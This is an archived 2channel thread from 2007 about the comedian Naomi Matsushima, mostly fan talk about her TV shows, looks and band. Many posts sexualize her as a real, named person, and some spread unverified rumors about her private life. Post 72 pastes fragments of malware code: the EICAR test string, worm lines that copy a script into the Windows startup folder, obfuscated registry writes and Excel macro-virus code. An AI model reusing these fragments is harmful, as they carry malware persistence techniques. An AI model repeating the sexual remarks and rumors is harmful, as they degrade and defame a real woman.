5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【白い】オセロ松嶋を乱れ牡丹でハメハメ12【悪魔】

1 :名無しさん@板分割議論中:2007/01/31(水) 23:00:43
なおみじゃないよなほみだよ

前スレ
【中に】オセロ松嶋とフェラバックで3P 11【だすよ】
http://tv9.2ch.net/test/read.cgi/geinin/1164702640/

過去ログ
オセロ松嶋をバックでガンガン
http://tv7.2ch.net/geinin/kako/1096/10961/1096105625.html
【天然】オセロ松嶋を正常位でしっぽり【純白】
http://tv7.2ch.net/test/read.cgi/geinin/1106826932/
【エロ】オセロ松嶋を駅弁でガッツン 3【可愛い】
http://tv7.2ch.net/test/read.cgi/geinin/1112706405/
【写真集】オセロ松嶋を69でレロレロ 4【発売!?】
http://tv7.2ch.net/test/read.cgi/geinin/1125801280/
【写真集】オセロ松嶋をマングリでクチュクチュ 5【発売!!】
http://tv7.2ch.net/test/read.cgi/geinin/1132799003/
【Aから】オセロ松嶋を松葉崩しでグイグイ 6【Cに?】
http://tv7.2ch.net/test/read.cgi/geinin/1136452933
【太股】オセロ松嶋を騎乗位でズンズン7【むち】
http://tv7.2ch.net/test/read.cgi/geinin/1141574651/
【大阪城】オセロ松嶋をイラマチオでズポズポ8【ライブ】
http://tv7.2ch.net/test/read.cgi/geinin/1147308755/
【Tバック】オセロ松嶋と対面座位でハァハァ9【パンツ】
http://tv7.2ch.net/test/read.cgi/geinin/1153805378/
【抜ける】オセロ松嶋を指マンでグッショリ10【34才】
http://tv7.2ch.net/test/read.cgi/geinin/1157788059/

2 :名無しさん@板分割議論中:2007/01/31(水) 23:28:09
>>2Get!!

3 :名無しさん@板分割議論中:2007/02/01(木) 02:35:52
エロ写真集だして

4 :名無しさん@板分割議論中:2007/02/01(木) 02:50:10
エロを狙わないほうが抜ける
番組でスカート姿で飛び跳ねて見えそで見えない時とか
ニーソの脚とか黒ストの脚とか

5 :ガッチャマンG-5号:2007/02/01(木) 04:10:22
>>1
ミニスカ黒タイツ

6 :名無しさん@板分割議論中:2007/02/01(木) 04:18:39
>>1
誰が悪魔やねん!死神や!!

7 :名無しさん@板分割議論中:2007/02/01(木) 08:42:41
なにこのスレ
とりあえずエロ動画くれ

8 :名無しさん@板分割議論中:2007/02/01(木) 16:33:29
ザ・ワイドに出てた

9 :名無しさん@板分割議論中:2007/02/01(木) 22:08:35
>>8
知りたいです

10 :名無しさん@板分割議論中:2007/02/01(木) 22:11:42
リアルタイムにも出てたよ
インフルエンザ直ったみたいでよかった

11 :名無しさん@板分割議論中:2007/02/02(金) 02:18:26
鳥インフルエンザ?

12 :名無しさん@板分割議論中:2007/02/02(金) 14:52:29
某画像掲示板で松嶋スレ立ってたので、かき集めたの置いとくお。
uporg 677142 zip

13 :名無しさん@板分割議論中:2007/02/02(金) 15:08:14
スマン、貼り直し
ttp://up.rgr.jp/index.html
7549

14 :名無しさん@板分割議論中:2007/02/02(金) 18:59:04
>>13
ありがとう
ネプ投げの動画持ってるけど、その画像にある場面となぜか違うんだよね

15 :名無しさん@板分割議論中:2007/02/02(金) 19:26:26
昔はシモネタ普通に言ってたのに売れてくるとぱったりだな
性行為の話しまた聞きたいワ

16 :名無しさん@板分割議論中:2007/02/02(金) 19:35:38
しょこたんブログになほみちゃん載ってる

17 :名無しさん@板分割議論中:2007/02/02(金) 22:11:10
吐きそー

18 :名無しさん@板分割議論中:2007/02/03(土) 02:24:00
尚美ちゃんが心の底から愛おしい

19 :名無しさん@板分割議論中:2007/02/03(土) 02:51:58
>>15
>性行為の話
詳しく!

20 :名無しさん@板分割議論中:2007/02/03(土) 07:16:56
俺が覚えてるのはHは自分の部屋じゃなくて彼氏の部屋もしくはホテルがいい
って話し
自分の部屋は現実的過ぎるんだってさ
誰か他に覚えてる人いないけ?もっとエロい話してたよね

21 :名無しさん@板分割議論中:2007/02/03(土) 07:52:55
車運転しながらフェラ、ドラフェラの話は憶えてる

22 :名無しさん@板分割議論中:2007/02/03(土) 08:43:02
>>21
kwsk

23 :名無しさん@板分割議論中:2007/02/03(土) 09:59:04
彼氏が車を運転しながらフェラをするかって話しになり、その他大勢の
アイドルくずれみたいな女連中は普通すると発言
松嶋はその時曖昧なリアクションだったが、じゃあしたことあるのねという
まとめだった 真偽は分からない

24 :名無しさん@板分割議論中:2007/02/03(土) 11:18:34
今日の知っとこは病み上がりのせいかかわいかったな

25 :名無しさん@板分割議論中:2007/02/03(土) 17:12:21
また新バージョンのドコモのCMはじまったね

26 :名無しさん@板分割議論中:2007/02/04(日) 01:35:02
今日のしっとこ、顔変わってなかった?整形?

27 :名無しさん@板分割議論中:2007/02/04(日) 01:42:29
おまえは女を知らなすぎる

28 :名無しさん@板分割議論中:2007/02/04(日) 01:45:00
>>26
松嶋の顔って化粧で7変幻出来るよー

29 :名無しさん@板分割議論中:2007/02/04(日) 03:51:24
ttp://www.nikkansports.com/ns/entertainment/interview/2004/sun040516.jpg

30 :名無しさん@板分割議論中:2007/02/04(日) 04:21:35
このスレの奴松嶋のスッピン見たことないの?
しっとこで一回スッピン晒したよ

31 :名無しさん@板分割議論中:2007/02/04(日) 04:23:57
大坂城ホールのときもスッピン晒してる

32 :名無しさん@板分割議論中:2007/02/04(日) 04:49:32
髪が黒でメイクもほとんどしてないとこ見るとギリギリまで寝て休んでいると思われる。
ヲレはてっきりプレグナントかと思ったよ・・・ガッカリ

33 :名無しさん@板分割議論中:2007/02/04(日) 13:47:57
ライトの当り方でどーにでもなるよ
ここのスレは女しらなすぎるわwwwwwwwwwww

34 :名無しさん@板分割議論中:2007/02/04(日) 13:50:00
本人はスッピン嫌だつってるけどスッピンも可愛いよ

35 :名無しさん@板分割議論中:2007/02/04(日) 14:35:58
女知ってるひとはもっとレベルの高い女を求めて日々行動してくださいw
お前も同じ穴のムジナって扱いされるぞwww

36 :名無しさん@板分割議論中:2007/02/04(日) 15:37:35
うまい棒好きらしいよ

37 :名無しさん@板分割議論中:2007/02/04(日) 16:54:29
松嶋結婚の噂と2ch閉鎖の噂、2つともガセだったのかよ。
どっちも信じてた・・・

38 :名無しさん@板分割議論中:2007/02/04(日) 17:08:45
俺たちみたいに精神科に通ってる者にはきつかったよね
尚美ちゃんが入籍するなんて書き込むから
ずっとモンモンとして精神不安定だったよ

39 :名無しさん@板分割議論中:2007/02/04(日) 17:23:24
この前ピザの配達で行ったら黒のスパッツ姿で出てきたよ。

40 :名無しさん@板分割議論中:2007/02/04(日) 17:30:07
>>39
それ、なんて江頭?

41 :名無しさん@板分割議論中:2007/02/04(日) 20:00:31
イッテQ、初回なのに尚美ちゃん出てないorz

42 :名無しさん@板分割議論中:2007/02/04(日) 20:02:38
インフルエンザの時に収録があったと思われ。

43 :名無しさん@板分割議論中:2007/02/04(日) 23:04:56
おい、ここの住人は一人でケーキバイキング行ったりひとりでカラオケ行ったりしてる奴ばっかなのかよ…w
もっと社交的になれよwww

まぁ漏れもヒトカラは結構行ってるがw



44 :名無しさん@板分割議論中:2007/02/05(月) 10:50:37
なんか見えないものが見える人が沢山いるねw

45 :名無しさん@板分割議論中:2007/02/05(月) 14:55:32
すっぴんでも、かわいいやん。
充分ストライクだぞ

46 :名無しさん@板分割議論中:2007/02/05(月) 23:30:30
そういや今日のきらきらにも出ないんだったな・・・

47 :名無しさん@板分割議論中:2007/02/05(月) 23:43:05
今日のアフロは代打でNさん登場!





ラテ欄のその言葉に騙されたorz

48 :名無しさん@板分割議論中:2007/02/06(火) 15:28:01
鼻の穴はNGで尻の穴はOKなのか・・・

49 :名無しさん@板分割議論中:2007/02/06(火) 17:12:39
毎月浣腸している女ナホミ。
鼻クソほじらないことに決めた女ナホミ。

50 :名無しさん@板分割議論中:2007/02/06(火) 19:18:16
鶴瓶だけじゃ面白くないってことが解った

51 :名無しさん@板分割議論中:2007/02/06(火) 19:22:53















創価学会員(芸術部副部長) 久本雅美が会合で涙ながらに池田名誉会長を大絶賛する映像
http://www.youtube.com/watch?v=xxim0nN9KuM

52 :名無しさん@板分割議論中:2007/02/06(火) 21:34:09
今週は宇木登場!

53 :名無しさん@板分割議論中:2007/02/07(水) 00:27:15
とっととミニスカート多めの写真集出せ

54 :名無しさん@板分割議論中:2007/02/07(水) 12:38:07
松嶋は毎週金曜日の深夜にウ〇〇ティンHで恋人の〔お〇もとD〕と過ごしてるらしい。

55 :名無しさん@板分割議論中:2007/02/07(水) 14:21:38
台湾行ったんだってね。
ブログはオセロの仲良しぶりがでてた

56 :名無しさん@板分割議論中:2007/02/07(水) 22:49:54
最近カバちゃんが、女に見えてきた
やばいなぁー

57 :名無しさん@板分割議論中:2007/02/08(木) 00:40:49
あの太ももは反則

58 :名無しさん@板分割議論中:2007/02/08(木) 16:21:13
台湾台湾行きタイわん

59 :名無しさん@板分割議論中:2007/02/09(金) 17:52:20
今さらですまんが
先週の知っとこの尚美ちゃんが
かわいすぎる

60 :名無しさん@板分割議論中:2007/02/09(金) 18:21:35
病み上がりだからか、か弱そうに見えたな
たしかに可愛かった

61 :名無しさん@板分割議論中:2007/02/09(金) 19:58:26
可愛すぎて実況では整形疑惑まで出てたな

62 :名無しさん@板分割議論中:2007/02/09(金) 22:53:00
あーーー見逃したあああああ
うp!うp!うp!

63 :名無しさん@板分割議論中:2007/02/10(土) 00:25:18
漏れも見逃したorz

しっとこの生放送の後にきらきら収録してるんだった?
それなら病み上がりの尚美ちゃんを見れるチャンスだ!

64 :名無しさん@板分割議論中:2007/02/10(土) 00:36:13
知っとこのサイトも
ファッションコーナー作ってほしいよ

65 :名無しさん@板分割議論中:2007/02/10(土) 09:14:22
今朝のナホミもギザカワユス!

66 :名無しさん@板分割議論中:2007/02/10(土) 09:46:17
お姫様みたいな服なのになんでスニーカーはいてるんだろう

67 :名無しさん@板分割議論中:2007/02/10(土) 11:31:47
あえての外しテクだよ
オシャレだなぁ

68 :名無しさん@板分割議論中:2007/02/10(土) 16:41:11
尚美ちゃんはカワイクて性格も良くて最高だな。
こんな奥さん欲しいな

69 :名無しさん@板分割議論中:2007/02/10(土) 18:35:14
●今週の顔:松嶋尚美/バンドを始めたと思ったらもう解散。<ホワイトデビル>はワガママ?

SPA!(2/20)

70 :名無しさん@板分割議論中:2007/02/10(土) 20:37:03
ライヴのレポートまだか

71 :名無しさん@板分割議論中:2007/02/10(土) 20:56:07
zipperライブ行ってきました☆

72 :名無しさん@板分割議論中:2007/02/10(土) 21:31:08
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


73 :名無しさん@板分割議論中:2007/02/10(土) 22:59:37
IQサプリで問題を真剣に考えてる時の顔がよかった

74 :名無しさん@板分割議論中:2007/02/10(土) 23:21:30
カワズ君は今週も休みか

75 :名無しさん@板分割議論中:2007/02/11(日) 00:31:56
松嶋めっちゃええ女やん。お?ちんぽ勃ってきた。

76 :名無しさん@板分割議論中:2007/02/11(日) 09:02:34
芸人じゃなくて、タレントだな
面白くない 勘違い女

77 :名無しさん@板分割議論中:2007/02/11(日) 09:14:25
なんだこのスレw

キモ不細工の松嶋の自演スレかw

78 :名無しさん@板分割議論中:2007/02/11(日) 12:27:31
蛆虫が涌いてきた

79 :名無しさん@板分割議論中:2007/02/11(日) 19:26:50
松嶋に嫉妬してる中島の自演

80 :名無しさん@板分割議論中:2007/02/11(日) 19:28:45
イってQで観覧者募集してるぞ

81 :名無しさん@板分割議論中:2007/02/11(日) 19:48:50
おまいらいつも松嶋のどの画像で抜いてるんだ?
つーかおかずが少なすぎる


82 :名無しさん@板分割議論中:2007/02/11(日) 21:10:04
>>81
フトモモスキーの俺は、
ミニスカやホットパンツ等で十分抜ける!!

83 :名無しさん@板分割議論中:2007/02/11(日) 21:12:13
きになるオセロで抜いてます。あと、アフロのお菓子食う所はパンチラ率多し。

84 :名無しさん@板分割議論中:2007/02/11(日) 21:53:16
>>81

>>13に詰め合わせパックがあったんだがもうダメみたい

85 :名無しさん@板分割議論中:2007/02/11(日) 22:48:09
握手した時の想い出で抜いている

86 :名無しさん@板分割議論中:2007/02/11(日) 23:02:34
>>81
写真集

87 :名無しさん@板分割議論中:2007/02/12(月) 16:02:50
ドシロウト松嶋と東野かよw

88 :名無しさん@板分割議論中:2007/02/12(月) 18:28:50
ドシロウトで大口開けて蟹食べてたけど歯の裏白いね〜タバコ吸うわりには

89 :名無しさん@板分割議論中:2007/02/12(月) 22:00:59
>>81
顔のどアップを一時停止して抜ける。

90 :名無しさん@板分割議論中:2007/02/12(月) 22:35:32
ジャポニカロゴスの時可愛いな

91 :名無しさん@板分割議論中:2007/02/12(月) 23:40:38
新しい写真集マダー?

92 :名無しさん@板分割議論中:2007/02/12(月) 23:47:15
松嶋がかわいい言ってるやつはまともな恋愛した事あんのかよ
どうみてもババアだろ
外でて歩いてる女見てみろよ

93 :名無しさん@板分割議論中:2007/02/13(火) 00:15:41
何言ってんだ
そこらへんの糞ギャルより全然可愛い

94 :名無しさん@板分割議論中:2007/02/13(火) 00:45:32
今日キラキラいないんだな

95 :名無しさん@板分割議論中:2007/02/13(火) 20:23:08
松嶋より可愛い女子なんていないよ。

96 :名無しさん@板分割議論中:2007/02/13(火) 22:11:06
>>92
こういう発言ほど恋愛経験の少なさを物語る発言は無い。
街を歩いてる女全員と付き合えると思ったら大間違いだ。

97 :名無しさん@板分割議論中:2007/02/13(火) 23:23:08
松嶋の可愛さは天地を揺るがす

98 :名無しさん@板分割議論中:2007/02/14(水) 04:10:47
ドシロウトの蟹食うシーンで尚美ちゃんと
仲良さそうな東野に嫉妬してしまう

99 :名無しさん@板分割議論中:2007/02/14(水) 07:40:34
>>98
そのあとバスの中で一緒に“寝た”と言ってたね

100 :名無しさん@板分割議論中:2007/02/14(水) 16:49:58
いい年だよ。そろそろ結婚しないと

101 :名無しさん@板分割議論中:2007/02/14(水) 17:34:12
尚美ちゃんからチョコもらいたい

102 :名無しさん@板分割議論中:2007/02/14(水) 18:41:08
尚美ちゃんは甘いもの嫌い

103 :名無しさん@板分割議論中:2007/02/14(水) 19:50:12
中島10代前半の少年ジャニとの共演番組とかで
太もも晒しまくってるね

絶対かかれてるな

104 :名無しさん@板分割議論中:2007/02/14(水) 19:51:42
それはないだろ

ズリネタにされてるかもだが

105 :名無しさん@板分割議論中:2007/02/14(水) 19:55:20
ttp://vista.crap.jp/img/vi7144748541.jpg

106 :名無しさん@板分割議論中:2007/02/14(水) 20:00:23
中島は髪型で損してる

107 :名無しさん@板分割議論中:2007/02/14(水) 20:41:35
spa!に1p載ってた

108 :名無しさん@板分割議論中:2007/02/14(水) 21:28:28
きらきら公式のファッションチェック
ちょっwおまっw

109 :名無しさん@板分割議論中:2007/02/15(木) 17:04:22
>>103
あんなオバハン相手にしないだろw

110 :名無しさん@板分割議論中:2007/02/15(木) 17:40:10
確かぴったんこカンカン?の華麗なる一族特集のやつにでてたとき
ワンピース短すぎてパンツみえてたような
だれか動画もってない?

111 :名無しさん@板分割議論中:2007/02/15(木) 18:06:39
忍者より松嶋のほうが売れてしまったなww

112 :名無しさん@板分割議論中:2007/02/15(木) 18:17:53
両方売れていないだろ。
中島の顔とか化粧抜きではすごいシワだろーな。
この前の気になるオセロみてそうオモタ

113 :名無しさん@板分割議論中:2007/02/15(木) 18:50:17
昨日のキニオセ黒パンがみえたな
黒パンだったから陰毛にみえた
一瞬ノーパンかとおもた。

114 :名無しさん@板分割議論中:2007/02/15(木) 20:09:24
>>113
詳しく

115 :名無しさん@板分割議論中:2007/02/15(木) 20:32:42
>>113
ピョンピョン跳ねてる時だろ?

116 :名無しさん@板分割議論中:2007/02/15(木) 21:15:06
そうそう二回目のジャンプの時
スローで見たらチラッと見えてたやつ!

117 :名無しさん@板分割議論中:2007/02/15(木) 21:30:24
ピョンピョン跳ねてる尚美ちゃんかわいいお

118 :名無しさん@板分割議論中:2007/02/15(木) 22:32:27
>>112
マックやドコモのCMに出ててレギュラーたくさんかかえてる
2人のどこが売れてないんだよ

お前池沼かよ

119 :名無しさん@板分割議論中:2007/02/16(金) 01:05:53
>>116
あれはスカートの裏地だとオモ

120 :名無しさん@板分割議論中:2007/02/16(金) 06:33:29
デニムのミニスカは最高だぜ・・・

121 :名無しさん@板分割議論中:2007/02/16(金) 07:03:01
去年の11月後半の知っとこ録った人いませんか?
たしか、こどものみかたコーナーで、受験中のお姉ちゃんにハンバーガー作ってあげるって企画があった回。
もし録った人いたらメールください。

122 :名無しさん@板分割議論中:2007/02/16(金) 07:05:16
菊池凛子に似てる。美人だね。

123 :名無しさん@板分割議論中:2007/02/16(金) 08:40:59
まあ芸能界で金稼ぎまくってるんだから裏があるはずだ
枕女だろ

124 :名無しさん@板分割議論中:2007/02/16(金) 11:04:36
>>123
藻毎盲目だな

125 :名無しさん@板分割議論中:2007/02/16(金) 12:12:40
>>123
こいつに言わせると山田花子とか久本も枕女ってことになる

126 :名無しさん@板分割議論中:2007/02/16(金) 13:27:11
>>125
少しキレイだと枕女、花子じゃ興味も無い?

127 :名無しさん@板分割議論中:2007/02/16(金) 14:17:29
セックスの時すごい大声であえぎそう

128 :名無しさん@板分割議論中:2007/02/16(金) 14:20:05
でも声汚いから、、、。

129 :名無しさん@板分割議論中:2007/02/16(金) 15:43:13
松嶋の美脚が大好きな俺でもあの声には萎える

130 :名無しさん@板分割議論中:2007/02/16(金) 17:08:48
俺、あの声好きだけどなぁ。

131 :名無しさん@板分割議論中:2007/02/16(金) 17:41:23
俺も声に一票。
脚もいい、というか全部いい

132 :名無しさん@板分割議論中:2007/02/16(金) 20:44:57
ぎゅってしたい

133 :名無しさん@板分割議論中:2007/02/16(金) 21:40:36
蹴っ飛ばしたい

134 :名無しさん@板分割議論中:2007/02/16(金) 23:45:10
ふんずけてやりたい

135 :名無しさん@板分割議論中:2007/02/17(土) 01:32:12
明日のしっとこみないといけないから寝ないと

136 :名無しさん@板分割議論中:2007/02/17(土) 01:42:24
音楽戦士来る〜

137 :名無しさん@板分割議論中:2007/02/17(土) 03:51:32
PVの松嶋のツインテール可愛すぎる

138 :名無しさん@板分割議論中:2007/02/17(土) 09:30:50
明日は新宿、代官山、六本木に行くって知っとこ!で言ってた

139 :名無しさん@板分割議論中:2007/02/17(土) 15:08:08
月曜に豊洲でライブだと・・・行こうかな

140 :名無しさん@板分割議論中:2007/02/17(土) 18:20:48
調子に乗ってるブス女のスレはここでいいの?

141 :名無しさん@板分割議論中:2007/02/17(土) 20:03:17
ニッポン放送でKILLERSの武道館コンサートのCMやってた

142 :名無しさん@板分割議論中:2007/02/17(土) 22:17:25
おまえら、あんなブスで音痴の武道館コンサート
見に行く事を彼女・親兄弟・友達・同僚に話せるのか?
馬鹿にされるわぁwwwww


143 :名無しさん@板分割議論中:2007/02/17(土) 22:26:33
ブスにはみえない
残念ながら

144 :名無しさん@板分割議論中:2007/02/17(土) 22:30:34
>>140
>>142


145 :名無しさん@板分割議論中:2007/02/17(土) 23:10:57
>>142
話す相手いなくて可哀想ですね

146 :名無しさん@板分割議論中:2007/02/17(土) 23:11:39
僕は彼女・友達はいないし同僚とは仕事のこと以外話さない
ママに尚美ちゃんを見に行くと言ったら
松嶋は結構いい歳なのに、ちゃんづけなの.......と言われた

147 :名無しさん@板分割議論中:2007/02/17(土) 23:38:18
カワズ君でタイツ履いてるのいいなー

148 :名無しさん@板分割議論中:2007/02/17(土) 23:45:18
CAPうp

149 :名無しさん@板分割議論中:2007/02/18(日) 01:23:44
>>142
世間的にはオメーのが馬鹿にされてるということには触れられないのでしょうか?

150 :名無しさん@板分割議論中:2007/02/18(日) 09:48:52
しぃ〜っ!

151 :名無しさん@板分割議論中:2007/02/18(日) 10:17:43
もうおばさん

152 :名無しさん@板分割議論中:2007/02/18(日) 12:49:24
>>145 >>149
ばかやろ!嵐相手にするな!釣られる君たちも同じだよ


153 :名無しさん@板分割議論中:2007/02/18(日) 15:00:23
ttp://www.sonymusic.co.jp/Music/Info/killers/special/uta/index.html
sex ver.ってどんだけ

154 :名無しさん@板分割議論中:2007/02/18(日) 15:03:57
今日12時頃に予約して入場券番号が40番台だった
思ったほど人気ないんじゃないの

155 :名無しさん@板分割議論中:2007/02/18(日) 15:06:31
きになるでの衣装がいつも楽しみ。

156 :名無しさん@板分割議論中:2007/02/18(日) 15:09:21
タワレコ?

157 :名無しさん@板分割議論中:2007/02/18(日) 15:12:07
渋谷のタワレコ2階

158 :名無しさん@板分割議論中:2007/02/18(日) 15:44:59
松嶋のセミヌード写真集売ってたけど
エロいの?上品なだけのヘアヌード写真集とか大嫌い
エロいなら欲しい

159 :名無しさん@板分割議論中:2007/02/18(日) 16:47:05
残念だがエロくない

160 :名無しさん@板分割議論中:2007/02/18(日) 19:33:45
この人、東大阪市出身なんだってな?俺も東大阪市出身なんだが、詳しい町名知ってる人いる?


161 :名無しさん@板分割議論中:2007/02/18(日) 20:03:22
いまテレビ出てるよミニスカパンチラしそう

162 :名無しさん@板分割議論中:2007/02/18(日) 20:07:18
>>158
ナホミで抜きたいなら想像力が一番

163 :名無しさん@板分割議論中:2007/02/18(日) 20:07:57
昨日の知っとこでマフラー巻いてる尚美ちゃんかわいかった

164 :名無しさん@板分割議論中:2007/02/18(日) 21:15:55
おかゆ茶わんをゲストに渡してた時の
絶対領域はすばらしかった

165 :名無しさん@板分割議論中:2007/02/18(日) 21:45:32
CDのおまけまた缶バッジなんだね
どうせならポストカードとかの方がよかったなあ

166 :名無しさん@板分割議論中:2007/02/19(月) 02:26:20
尚美ちゃんとキスする夢を何度も見る。
もう重症だ…

167 :名無しさん@板分割議論中:2007/02/19(月) 02:34:40
俺にも見せろ

168 :名無しさん@板分割議論中:2007/02/19(月) 15:36:08
ロリ系の服ばっかじゃなくて、大人っぽいセクシーミニスカもきぼん

169 :名無しさん@板分割議論中:2007/02/19(月) 15:52:13
パンツ洗えよ〜

おばさん

170 :名無しさん@板分割議論中:2007/02/19(月) 16:29:46
おばさんじゃないよ。可愛い可愛い女の子だよ

171 :名無しさん@板分割議論中:2007/02/19(月) 18:51:59
豊洲行ってきた「JAPANESE GIRL」と「TROUBLE QUEEN」の2曲だけやって終わり
豊洲のHMVで買うとポスターくれるらしい(サイン付き?後でサインするって言ってたけど・・・
もちろん限定だけどね)

周りのお客さんが尚美ちゃんみて「カワイイ〜!お人形さんみたい!」って何組かが言ってた

カメラが何台かあったけどなんかの番組で放送するのかな?武道館DVDのオマケ?

後、難波さんがいたよw

172 :名無しさん@板分割議論中:2007/02/19(月) 20:24:37
ちかまろがブログはじめたw

173 :名無しさん@板分割議論中:2007/02/19(月) 21:09:16
>>172
で、誰が見るの?

174 :名無しさん:2007/02/19(月) 23:41:53
ちかまろなんてどうでもいい
松嶋を出せ

175 :名無しさん:2007/02/20(火) 00:41:16
もしかしてアホですか

176 :名無しさん:2007/02/20(火) 01:42:43
2/27(火)25:35-26:30 日本テレビ「松嶋尚美の真実」

なんだろこれ
西川が出るらしい

177 :名無しさん:2007/02/20(火) 02:57:00
>>176
ttp://www.sonymusic.co.jp/Music/Arch/DF/killers/m_info.html

178 :名無しさん:2007/02/20(火) 22:01:43
きらきらで
「これは新撰組みたいやな」
って言ったけどみんな聞いてなくてもう一回言うときの
松嶋の弱気な感じがツボ。

179 :名無しさん:2007/02/20(火) 22:20:29
カワズが3月で終わるみたいだね。松嶋の番組だったのに青木とくりーむがぶち壊したせいだ。
あいつらレギュラー多いだけで代名詞になるような番組ひとつもない空気芸人ですね。

180 :名無しさん:2007/02/20(火) 22:30:01
バッカおめー
くりぃむのオールナイトニッポン聞け

181 :名無しさん:2007/02/20(火) 22:52:50
>>180
テレビの話してんだよ

182 :名無しさん:2007/02/20(火) 22:59:20
>>179
つくりぃむナントカ

183 :名無しさん:2007/02/20(火) 23:12:39
>>179
ま、ぶち壊されたのは事実だな

184 :名無しさん:2007/02/21(水) 00:39:16
くりーむしちゅーだけは何で冠番組もてるのかわからん
華があるわけでもなし、圧倒的に面白いわけでもない
おぎやはぎや品川庄司とかと同じポジションだと思うけど

185 :名無しさん:2007/02/21(水) 00:47:16
海砂利はいいから尚美ちゃんの話しろよ

186 :名無しさん:2007/02/21(水) 00:56:38
東京の笑のレベルが低いからだよ

エンタ見てみろよ、ピン芸人全部同じキャラばっかじゃん
歌、ラップ、コスプレ組み合わせて、ぼやき漫談やってるだけじゃん

おまけにテレビ局に甘やかされて、ネタで使う備品やセット、フリップ全部豪華なの
用意されてるし、局が無理やり売ってる芸人ばっかじゃん

あれで笑ってるやつらアホかと

あ〜いとぅいまてぇ〜ん・・・って、ムカツク!!
ちっくしょ〜!!・・・・・って おもんないって!!
ポンスポ〜ン・・・・・

187 :名無しさん:2007/02/21(水) 01:03:27
>>186
フリップ全部豪華なの
フリップ全部豪華なの
フリップ全部豪華なの
フリップ全部豪華なの
フリップ全部豪華なの
フリップ全部豪華なの
フリップ全部豪華なの
フリップ全部豪華なの

188 :名無しさん:2007/02/21(水) 01:03:29
エンタなんか見んなよw

189 :名無しさん:2007/02/21(水) 01:20:57
>>188
いや、途中で目に付いってうっとおしいだけ

>>187
どうした関東人、悔しいか?レベル低いなw
笑いと言えば、コントかキャラしかないってか?w

は〜い、コントやりま〜すとかw
良く恥ずかしくないなwだから、ウンナンとかまだ生き残ってるんだろな
まったく面白くもないのにな

190 :名無しさん:2007/02/21(水) 02:00:15
ゴールデンってどのチャンネル見てもつまらないよね。最近は。
エンタのせいか?

191 :名無しさん:2007/02/21(水) 02:55:20
目に付いって

192 :名無しさん:2007/02/21(水) 03:21:40
>>179
マジ?ソースどこ

193 :名無しさん:2007/02/21(水) 08:13:18
カワズ君は、昔のスタイルに戻して復活してほしい。
あのマッタリした雰囲気が良かったのに。

194 :名無しさん:2007/02/21(水) 09:00:07
>>191
よっぽど悔しいんだな、関東人
突っ込みがやっぱ下手だなw

195 :名無しさん:2007/02/21(水) 11:20:45
関西人は方言をやめればいいと思う
他の出身地の人はみんなそうしてるのに

196 :名無しさん:2007/02/21(水) 11:29:12
>>195
と思いつつ、関西弁が浸透しつつある関東エリア
そのうち関西弁が標準語になるんだろうな

197 :名無しさん:2007/02/21(水) 11:35:01
笑いは関西の方が未だに遅れてるんじゃね?
DTだけレベルが高すぎて東京進出のおかげで関西弁は浸透したけど
笑いのバリエーションは明らかに東京が上、エンタしか見てない人や
ああいった番組しか作れない局が悪いんだけどね

198 :名無しさん:2007/02/21(水) 12:00:50
>>197
笑いは関西の方が未だに遅れてるんじゃね?

こういうのがとんねるずとかで笑ってられるんだろうなw

199 :名無しさん:2007/02/21(水) 12:38:40
エンタは子供に受けるようなキャラを作って出してるって分からないの?
それに対してつまらんって・・・
関西って笑いの幅が狭い全部同じ
ダウンタウンがうけたのは関西っぽくないからなのに

200 :名無しさん:2007/02/21(水) 15:54:00
>>176
関東地区だけかよー…
地元の番組表

01:26 BILLBOARD TOP30
01:41 Sテラス
01:46 攻殻機動隊S.A.C.2ndGIG 第20回
02:16 サブちゃんと歌仲間

オワタ\(^o^)/

201 :名無しさん:2007/02/21(水) 16:05:40
>>199
は?w
エンタのキャラでうけてる関東人の大の大人が大量にいるだろ
ダウンタウンが関西っぽくないって?w
どこみてんだ?バリバリ関西だろ、トークベースで
番組によっちゃあ、キャラっぽいことさせられるがな・・・

トーク、ゲストいじりで十分笑わせられる。
東京の芸人じゃあ到底無理だけどな、すぐ消えてくしw
タモリぐらいだろ長持ちしてんのは、あれも別におもろくないけどな、
パターン化して、関東人が洗脳されてるだけw

いや〜ひどいね〜関東人w

202 :名無しさん:2007/02/21(水) 16:45:36
尚美「私のために争うのはやーめーてー(;´Д`)」

203 :名無しさん:2007/02/21(水) 17:09:32
関西でおもしろいのは
ぐっさん、陣内智則、島田伸介、原西、藤井隆、田村淳、中川家、ダウンタウン
他にいるけど思い浮かばない。

204 :名無しさん:2007/02/21(水) 17:27:33
大阪の芸人も東京ではお前ら関東人でもわかる程度に
レベルダウンしてやってるのがわからんのか?
キャラとかコントとかな・・・

すべらない話見てたらわかるだろ
100%トークであれだけうけるんだよ

たまに関東風の芸人がしゃべる時は寒いけどな

関東風芸人だけですべらない話やってみろ、番組打ち切りになるだろうな

205 :名無しさん:2007/02/21(水) 17:37:10
>>203
さんまさん

206 :名無しさん:2007/02/21(水) 17:43:53
>>203
鶴瓶、松島忘れてるぞ!

207 :名無しさん:2007/02/21(水) 17:56:39
陣内はつまんねーよ


208 :名無しさん:2007/02/21(水) 17:59:20
>>207
あれはもろ東京風味ね

209 :名無しさん:2007/02/21(水) 18:06:04
尚美「新撰組みたいやな(2回目)(´・ω・`)」

210 :名無しさん:2007/02/21(水) 19:13:00
関東で面白いのは
